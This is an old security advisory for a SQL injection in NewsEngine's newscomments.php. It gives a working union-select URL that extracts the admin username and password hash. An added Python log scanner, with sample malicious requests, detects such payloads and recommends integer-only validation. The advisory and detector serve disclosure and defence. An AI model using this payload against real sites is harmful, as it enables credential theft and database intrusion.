SECURITYVULNS:DOC:12997
Jun 06, 2006 - 12:00 a.m.

NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

Author : ajann

Vulnerability:

$$$ http://[target]/[path]/newscomments.php

Example:

$$
http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news1_user/**/where/**/userid=1/*

Admin MD5 HaSh
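
Added example, not part of the original advisory: a log check that flags requests to newscomments.php whose newsid is not a plain integer, replacing /* */ comments with spaces first so a union/select written with comments as separators is still recognized. The access-log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumed combined log format, documentation IPs).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Jun/2006:10:00:01 +0000] "GET /news/newscomments.php?newsid=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [06/Jun/2006:10:00:05 +0000] "GET /news/newscomments.php?newsid=%27/**/UnIoN/**/SeLeCt/**/0,username/**/from/**/news1_user/* HTTP/1.1" 200 812',
    '198.51.100.9 - - [06/Jun/2006:10:00:09 +0000] "GET /news/newscomments.php?newsid=7%20or%201=1 HTTP/1.1" 200 900',
    '198.51.100.3 - - [06/Jun/2006:10:00:12 +0000] "GET /news/index.php?newsid=abc HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Closed comments (/* ... */) and an unterminated trailing comment (/* ...).
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def classify_newsid(value):
    """Return None for a plain integer id, otherwise a short reason string."""
    if re.fullmatch(r"\d+", value):
        return None
    # Comments become spaces so '/**/' used as whitespace cannot hide keywords.
    normalized = SQL_COMMENT_RE.sub(" ", value)
    if UNION_SELECT_RE.search(normalized):
        return "union-select in newsid"
    return "non-numeric newsid"

def scan(lines):
    """Return a list of (client_ip, reason, decoded_value) for suspicious requests."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/newscomments.php"):
            continue
        # parse_qs percent-decodes the value before it is classified.
        for value in parse_qs(url.query, keep_blank_values=True).get("newsid", []):
            reason = classify_newsid(value)
            if reason:
                findings.append((line.split()[0], reason, value))
    return findings

if __name__ == "__main__":
    for ip, reason, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

The same integer-only rule is the fix on the application side: a newsid that is not all digits should be rejected before it reaches the query.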